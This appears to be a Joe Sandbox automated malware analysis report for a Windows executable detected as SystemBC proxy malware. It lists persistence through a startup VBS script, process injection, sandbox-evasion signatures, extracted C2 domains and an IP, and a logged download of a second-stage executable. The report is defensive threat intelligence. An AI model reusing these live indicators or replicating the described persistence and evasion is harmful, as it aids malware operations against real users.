Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uC4EETMDcz.exe

Overview

General Information

Sample name:uC4EETMDcz.exe
renamed because original name is a hash value
Original sample name:01b4e5031bce630ff9a75984dbce65e4.exe
Analysis ID:1576044
MD5:01b4e5031bce630ff9a75984dbce65e4
SHA1:026f9b1f04df0b009aa478a4a072da9f38d695dd
SHA256:d7c59a22446f1c200c078a6e38131c755e1869717b939fa54b53360af4d2a059
Tags:exeSystemBCuser-abuse_ch
Infos:

Detection

SystemBC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected SystemBC
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • uC4EETMDcz.exe (PID: 3660 cmdline: "C:\Users\user\Desktop\uC4EETMDcz.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
    • uC4EETMDcz.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\uC4EETMDcz.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • wopbv.exe (PID: 368 cmdline: C:\ProgramData\faer\wopbv.exe MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
    • wopbv.exe (PID: 4324 cmdline: "C:\ProgramData\faer\wopbv.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • wscript.exe (PID: 4048 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • brokerutil.exe (PID: 3196 cmdline: "C:\Users\user\AppData\Local\brokerutil.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
      • brokerutil.exe (PID: 3916 cmdline: "C:\Users\user\AppData\Local\brokerutil.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • wopbv.exe (PID: 1456 cmdline: C:\ProgramData\faer\wopbv.exe MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
    • wopbv.exe (PID: 3088 cmdline: "C:\ProgramData\faer\wopbv.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SystemBCSystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Malware Configuration

Threatname: SystemBC

{"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SystemBCYara detected SystemBCJoe Security
      00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SystemBCYara detected SystemBCJoe Security
          00000001.00000002.2396891242.0000000005500000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.brokerutil.exe.3d87f90.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              1.2.uC4EETMDcz.exe.2be1354.0.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                11.2.wopbv.exe.322d6b8.0.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                  7.2.brokerutil.exe.2e1ba64.0.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                    4.2.wopbv.exe.28ed188.0.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , ProcessId: 4048, ProcessName: wscript.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , ProcessId: 4048, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\uC4EETMDcz.exe, ProcessId: 3660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SystemBC {"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\faer\wopbv.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Local\brokerutil.exeReversingLabs: Detection: 57%
                      Multi AV Scanner detection for submitted file
                      Source: uC4EETMDcz.exeReversingLabs: Detection: 57%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\brokerutil.exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\faer\wopbv.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: uC4EETMDcz.exeJoe Sandbox ML: detected
                      Source: uC4EETMDcz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: uC4EETMDcz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 051ACB91h1_2_051AC978
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 051ACB91h1_2_051AC988
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h1_2_0557D778
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056E5633h1_2_056E4FD4
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056E369Bh1_2_056E34E0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056E369Bh1_2_056E34D0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056E369Bh1_2_056E3630
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056E5633h1_2_056E4FD4
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056F5AC0h1_2_056F5A08
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056F5AC0h1_2_056F5A01
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 4x nop then jmp 056F5AC0h1_2_056F5AD8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 0521CB91h4_2_0521C978
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 0521CB91h4_2_0521C988
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_052BD778
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05425633h4_2_05424FD4
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 0542369Bh4_2_054234D0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 0542369Bh4_2_054234E0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 0542369Bh4_2_05423630
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05425633h4_2_05424FD4
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05545AC0h4_2_05545A00
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05545AC0h4_2_05545A08
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05545AC0h4_2_05545ADA
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 054ECB91h7_2_054EC978
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 054ECB91h7_2_054EC988
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_0558D778
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 05632CD0h7_2_05632C10
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 05632CD0h7_2_05632C18
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 056F5633h7_2_056F4FD4
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 056F369Bh7_2_056F34E0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 056F369Bh7_2_056F34D0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 056F369Bh7_2_056F3492
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 056F369Bh7_2_056F3630
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 4x nop then jmp 056F5633h7_2_056F4FD4
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05ACCB91h11_2_05ACC988
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05ACCB91h11_2_05ACC978
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_05B6D778
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05C45AC0h11_2_05C45ADA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05C45AC0h11_2_05C45A00
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05C45AC0h11_2_05C45A08
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05CD5633h11_2_05CD4FD4
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05CD369Bh11_2_05CD34D0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05CD369Bh11_2_05CD34E0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4x nop then jmp 05CD5633h11_2_05CD4FD4

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: wodresomdaymomentum.org
                      Source: Malware configuration extractorURLs: wodresomdaymomentum.org
                      Source: global trafficTCP traffic: 192.168.2.6:49813 -> 78.41.139.3:4000
                      Source: Joe Sandbox ViewASN Name: NEO-CUSTFR NEO-CUSTFR
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.199
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /files/mailer/blue.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: 45.155.249.199Cache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: wodresomdaymomentum.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 12:36:48 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 276Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 31 35 35 2e 32 34 39 2e 31 39 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at 45.155.249.199 Port 80</address></body></html>
                      Source: wopbv.exe, 00000008.00000002.3390352551.00000000012A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.155.249.199/files/mailer/blue.exe
                      Source: wopbv.exe, 00000008.00000002.3390000700.0000000000DEA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://45.155.249.199/files/mailer/blue.exe%
                      Source: wopbv.exe, 00000008.00000002.3390352551.000000000125B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.155.249.199/files/mailer/blue.exey
                      Source: uC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                      Source: uC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.000000000396C000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2744031290.0000000003E98000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3063157374.00000000042A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                      System Summary

                      barindex
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F9CE8 NtResumeThread,1_2_056F9CE8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F73C0 NtProtectVirtualMemory,1_2_056F73C0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F9CE0 NtResumeThread,1_2_056F9CE0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F73B8 NtProtectVirtualMemory,1_2_056F73B8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05549CF0 NtResumeThread,4_2_05549CF0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055473C0 NtProtectVirtualMemory,4_2_055473C0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05549CE8 NtResumeThread,4_2_05549CE8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055473B8 NtProtectVirtualMemory,4_2_055473B8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056349D8 NtProtectVirtualMemory,7_2_056349D8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05636F00 NtResumeThread,7_2_05636F00
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056349D0 NtProtectVirtualMemory,7_2_056349D0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05636EF8 NtResumeThread,7_2_05636EF8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C49CF0 NtResumeThread,11_2_05C49CF0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C473C0 NtProtectVirtualMemory,11_2_05C473C0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C49CE8 NtResumeThread,11_2_05C49CE8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C473B8 NtProtectVirtualMemory,11_2_05C473B8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Windows\Tasks\Test Task17.jobJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F8E5131_2_00F8E513
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F8A6601_2_00F8A660
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F82A251_2_00F82A25
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F8CBA21_2_00F8CBA2
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F8A6501_2_00F8A650
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F868681_2_00F86868
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F868591_2_00F86859
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F86DE81_2_00F86DE8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F9B6B81_2_04F9B6B8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F916EF1_2_04F916EF
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F9B6AA1_2_04F9B6AA
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F917001_2_04F91700
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F99C201_2_04F99C20
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F99C101_2_04F99C10
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F93B401_2_04F93B40
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F93B321_2_04F93B32
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_051AE5861_2_051AE586
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_051A89F81_2_051A89F8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_051AE9031_2_051AE903
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_055700401_2_05570040
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_055700061_2_05570006
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F71301_2_056F7130
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F39981_2_056F3998
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F71201_2_056F7120
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056F39881_2_056F3988
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056FA7E81_2_056FA7E8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056FA7F81_2_056FA7F8
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0571CDA01_2_0571CDA0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_057187C01_2_057187C0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_057187B01_2_057187B0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_057198501_2_05719850
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_057100401_2_05710040
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_057198401_2_05719840
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_057100071_2_05710007
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0571D0C71_2_0571D0C7
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0571E3981_2_0571E398
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0582ED481_2_0582ED48
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0582E1A01_2_0582E1A0
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_058100071_2_05810007
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_058100401_2_05810040
